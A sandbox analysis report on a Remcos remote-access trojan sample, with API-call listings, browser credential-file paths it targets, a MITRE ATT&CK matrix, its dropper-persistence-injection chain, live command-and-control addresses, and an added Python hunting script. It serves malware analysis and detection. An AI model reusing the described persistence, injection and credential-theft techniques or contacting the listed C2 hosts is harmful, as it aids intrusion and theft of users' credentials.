          Source: svchost.exe, 00000005.00000002.4072003934.0000000002C12000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: LRPC-8bd2641bc1c3c300cfProgram Manager1oftware
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4072031610.0000000002C65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490805278.0000000002E54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager]
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00130698 cpuid 0_2_00130698
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA,5_2_0040F8D1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,5_2_00452036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_004520C3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,5_2_00452313
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,5_2_00448404
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0045243C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,5_2_00452543
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00452610
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,5_2_004488ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00451CD8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,5_2_00451F50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,5_2_00451F9B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA,15_2_0040F8D1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,15_2_00452036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_004520C3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,15_2_00452313
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,15_2_00448404
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0045243C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,15_2_00452543
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452610
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,15_2_004488ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451CD8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,15_2_00451F50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW,15_2_00451F9B
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00188195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00188195
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0016D27A GetUserNameW,0_2_0016D27A
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0014B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0014B952
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
          Source: C:\Users\user\Desktop\GVV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
          Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 5_2_0040BA12
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 15_2_0040BA12
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: \key3.db 5_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 15_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: \key3.db 15_2_0040BB30
          Source: deblaterate.exe | Binary or memory string: WIN_81
          Source: deblaterate.exe | Binary or memory string: WIN_XP
          Source: deblaterate.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: deblaterate.exe | Binary or memory string: WIN_XPe
          Source: deblaterate.exe | Binary or memory string: WIN_VISTA
          Source: deblaterate.exe | Binary or memory string: WIN_7
          Source: deblaterate.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: C:\Windows\SysWOW64\svchost.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS (reported once for each of the two svchost.exe processes)
Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR
Source: C:\Windows\SysWOW64\svchost.exe | Code function: cmd.exe | 5_2_0040569A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: cmd.exe | 15_2_0040569A
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00191204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 0_2_00191204
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_00191806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_00191806
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004F1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 4_2_004F1204
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004F1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 4_2_004F1806
MITRE ATT&CK Matrix

Techniques followed by a bracketed number are the cells the report matched; the digits are the signature counts displayed in that cell. Techniques without a number are unmatched cells of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting [111]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API [1]; Command and Scripting Interpreter [1]; Service Execution [2]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting [111]; DLL Side-Loading [1]; Valid Accounts [2]; Windows Service [1]; Registry Run Keys / Startup Folder [2]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation [1]; DLL Side-Loading [1]; Bypass User Account Control [1]; Valid Accounts [2]; Access Token Manipulation [21]; Windows Service [1]; Process Injection [322]; Registry Run Keys / Startup Folder [2]; At; Cron
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; DLL Side-Loading [1]; Bypass User Account Control [1]; Masquerading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [12]; Access Token Manipulation [21]; Process Injection [322]
Credential Access: OS Credential Dumping [1]; Input Capture [221]; Credentials In Files [2]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [3]; System Information Discovery [26]; Security Software Discovery [141]; Virtualization/Sandbox Evasion [12]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [11]; Input Capture [221]; Clipboard Data [3]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [2]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Defacement [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID 1435345, sample GVV.exe, start date 02/05/2024, architecture Windows, score 100)

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 9 other signatures
Contacted domains: yuahdgbceja.sytes.net; geoplugin.net

Process tree (numbers in parentheses are the node counts drawn on the graph, see the legend above):

GVV.exe (6), started
    Dropped: C:\Users\user\AppData\...\deblaterate.exe, PE32
    Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection
    deblaterate.exe (3), started
        Dropped: C:\Users\user\AppData\...\deblaterate.vbs, data
        Signatures: Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; Drops VBS files to the startup folder; Found API chain indicative of sandbox detection
        svchost.exe (3, 14), started
            Network: geoplugin.net 178.237.33.50, ports 49709, 49717, 80, ATOM86-ASATOM86NL, Netherlands
            Network: yuahdgbceja.sytes.net 23.94.53.100, ports 2766, 49707, 49708, AS-COLOCROSSINGUS, United States
            Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 4 other signatures
            WerFault.exe (23, 16), started
            WerFault.exe (2, 16), started
wscript.exe (1), started
    Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    deblaterate.exe (2), started
        Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
        svchost.exe (12), started
            Signatures: System process connects to network (likely due to code injection or exploit); Installs a global keyboard hook

In the port lists, 80 and 2766 are the remote ports (HTTP to geoplugin.net, and the Remcos listener on a non-standard port); the 497xx values are the sandbox's local ephemeral ports. The second branch is the persistence path: the Startup-folder script deblaterate.vbs relaunches deblaterate.exe through wscript.exe, which again injects into a fresh svchost.exe. The two WerFault.exe children are crash handlers for the injected svchost.exe (the WER report files below name svchost.exe, PID 2248).
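The detection logic a responder would derive from this tree, as an added example that is not part of the Joe Sandbox report and not code from the sample. It checks Sysmon-style event records for the observable links in the chain: a Startup-folder .vbs run by wscript.exe, wscript.exe launching a binary under AppData, an svchost.exe whose parent is not services.exe, a connection from that svchost.exe to the C2 on port 2766 or to geoplugin.net, and the Rmc- mutex. The field names (Image, ParentImage, CommandLine, DestinationIp, DestinationPort, DestinationHostname, MutexName) and the assumption that services.exe is the only legitimate parent of svchost.exe are the example's own; the event records at the bottom are constructed to mirror the report and are not real telemetry.

```python
"""Hunting checks for the Remcos chain shown in the behavior graph above.

Added example, not code from the Joe Sandbox report or from the sample. It turns
the report's process tree, network contacts and mutex into checks over
Sysmon-style event dictionaries. The event records at the bottom are
constructed to mirror the report and are not real telemetry.
"""
from __future__ import annotations

# Indicators taken from the report.
C2_IPS = {"23.94.53.100"}            # yuahdgbceja.sytes.net
C2_PORTS = {2766}                    # Remcos listener on a non-standard port
GEO_HOST = "geoplugin.net"           # geolocation lookup made by the RAT
REMCOS_MUTEX_PREFIX = "Rmc-"         # e.g. Rmc-E70NOS
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def _l(value) -> str:
    """Lower-case a field, tolerating a missing value."""
    return (value or "").lower()


def check_process(ev: dict) -> list[str]:
    """Process-creation checks modelled on the report's process tree."""
    hits: list[str] = []
    image, parent, cmd = _l(ev.get("Image")), _l(ev.get("ParentImage")), _l(ev.get("CommandLine"))
    # wscript.exe running a .vbs out of the per-user Startup folder (persistence)
    if image.endswith("\\wscript.exe") and STARTUP_DIR in cmd and ".vbs" in cmd:
        hits.append("wscript.exe runs VBS from Startup folder")
    # the script host then launches a binary that lives under AppData
    if parent.endswith("\\wscript.exe") and "\\appdata\\" in image:
        hits.append("wscript.exe launched AppData binary")
    # svchost.exe not parented by services.exe (assumption: the only legitimate
    # parent); this is the injection target seen in the report
    if image.endswith("\\svchost.exe") and not parent.endswith("\\services.exe"):
        hits.append("svchost.exe spawned by " + (parent.rsplit("\\", 1)[-1] or "unknown"))
    return hits


def check_network(ev: dict) -> list[str]:
    """Network checks: C2 address/port and the geoplugin lookup from svchost.exe."""
    hits: list[str] = []
    image = _l(ev.get("Image"))
    ip, port = ev.get("DestinationIp"), int(ev.get("DestinationPort", 0))
    if ip in C2_IPS or port in C2_PORTS:
        hits.append(f"connection to Remcos C2 {ip}:{port}")
    # geoplugin.net is a public API; the signal is an svchost.exe instance asking it
    if _l(ev.get("DestinationHostname")) == GEO_HOST and image.endswith("\\svchost.exe"):
        hits.append("svchost.exe queried geoplugin.net")
    return hits


def check_mutex(ev: dict) -> list[str]:
    """Remcos names its mutex Rmc-<id>; the report shows Rmc-E70NOS."""
    name = ev.get("MutexName") or ""
    return [f"Remcos mutex {name}"] if name.startswith(REMCOS_MUTEX_PREFIX) else []


CHECKS = {"ProcessCreate": check_process, "NetworkConnect": check_network, "MutexCreate": check_mutex}


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Apply the check matching each event's type; return (event index, finding) pairs."""
    findings: list[tuple[int, str]] = []
    for i, ev in enumerate(events):
        for hit in CHECKS.get(ev.get("EventType"), lambda _ev: [])(ev):
            findings.append((i, hit))
    return findings


# Constructed events mirroring the report's tree (not real telemetry).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"'},
    {"EventType": "ProcessCreate", "Image": r"C:\Users\user\AppData\Local\silvexes\deblaterate.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "CommandLine": "deblaterate.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\silvexes\deblaterate.exe", "CommandLine": "svchost.exe"},
    {"EventType": "NetworkConnect", "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "DestinationIp": "23.94.53.100", "DestinationPort": 2766, "DestinationHostname": "yuahdgbceja.sytes.net"},
    {"EventType": "NetworkConnect", "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "DestinationIp": "178.237.33.50", "DestinationPort": 80, "DestinationHostname": "geoplugin.net"},
    {"EventType": "MutexCreate", "Image": r"C:\Windows\SysWOW64\svchost.exe", "MutexName": "Rmc-E70NOS"},
    # benign control rows: a normal service host and its update traffic
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"EventType": "NetworkConnect", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "20.42.73.29", "DestinationPort": 443, "DestinationHostname": ""},
]

if __name__ == "__main__":
    for index, finding in detect(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```

Run stand-alone it prints one finding for each of the six malicious rows and nothing for the two benign control rows. The parent check on svchost.exe is the one worth tuning in a real environment: on a live host, feed it the parent process names your EDR actually reports before relying on it.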

Antivirus detection

Sample
Source | Detection | Scanner
GVV.exe | 34% | ReversingLabs
GVV.exe | 31% | Virustotal
GVV.exe | 100% | Joe Sandbox ML

Dropped files
Source | Detection | Scanner
C:\Users\user\AppData\Local\silvexes\deblaterate.exe | 100% | Joe Sandbox ML

Unpacked PE files
No Antivirus matches

Domains
Source | Detection | Scanner
yuahdgbceja.sytes.net | 1% | Virustotal
geoplugin.net | 4% | Virustotal

URLs
Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
yuahdgbceja.sytes.net | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpal | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpSystem32 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpll | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpD6 | 0% | Avira URL Cloud | safe
yuahdgbceja.sytes.net | 1% | Virustotal |
http://geoplugin.net/json.gp~ | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpal | 0% | Virustotal |
http://geoplugin.net/json.gpD6 | 0% | Virustotal |
http://geoplugin.net/json.gp~ | 0% | Virustotal |
http://geoplugin.net/json.gpll | 0% | Virustotal |

The URL variants with trailing characters (json.gp/C, json.gpal, json.gpSystem32, json.gpll, json.gpD6, json.gp~) are the same http://geoplugin.net/json.gp string followed by whatever bytes sat next to it in the dumped memory, not distinct endpoints; for blocking or hunting, use the host geoplugin.net with path /json.gp. Note also that geoplugin.net itself is a public geolocation API and the scanners disagree on it (URL Reputation: phishing, Avira: safe); the useful signal is that an svchost.exe instance, not a browser, requests it, and that every sample sharing this IP in the context tables below is a Remcos analysis.
Contacted domains
Name | IP | Active | Malicious | Antivirus detection | Reputation
yuahdgbceja.sytes.net | 23.94.53.100 | true | true | (none) | unknown
geoplugin.net | 178.237.33.50 | true | true | (none) | unknown

Contacted URLs
Name | Malicious | Antivirus detection | Reputation
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
yuahdgbceja.sytes.net | true | 1% Virustotal; Avira URL Cloud: safe | unknown
URLs from memory and binaries
Name | Source | Malicious | Antivirus detection | Reputation
http://geoplugin.net/json.gpal | svchost.exe, 00000005.00000002.4072462611.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.9.dr | false | (none) | high
http://geoplugin.net/json.gp/C | deblaterate.exe, 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp; svchost.exe, 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp; deblaterate.exe, 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp; svchost.exe, 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp | true | URL Reputation: phishing | unknown
http://geoplugin.net/json.gpSystem32 | svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpll | svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpD6 | svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp~ | svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN name | Malicious
23.94.53.100 | yuahdgbceja.sytes.net | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1435345
            Start date and time:2024-05-02 15:06:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 8s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:GVV.exe
            Detection:MAL
            Classification:mal100.rans.troj.spyw.expl.evad.winEXE@12/21@2/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 50
            • Number of non-executed functions: 303
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240s for sample files taking high CPU consumption
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.42.73.29
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
15:09:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
15:10:04 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
15:10:51 | API Interceptor | 6x Sleep call for process: svchost.exe modified
Context: IPs
Match | Associated sample name / URL | Detection | Threat name | Context
23.94.53.100 | 202404294766578200.xlam.xlsx | malicious | Remcos | (none)
178.237.33.50 | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | 202404294766578200.xlam.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | nU7Z8sPyvf.rtf | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Tapril-30-receipt.vbs | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Tapril-30-receipt.vbs | malicious | Remcos | geoplugin.net/json.gp
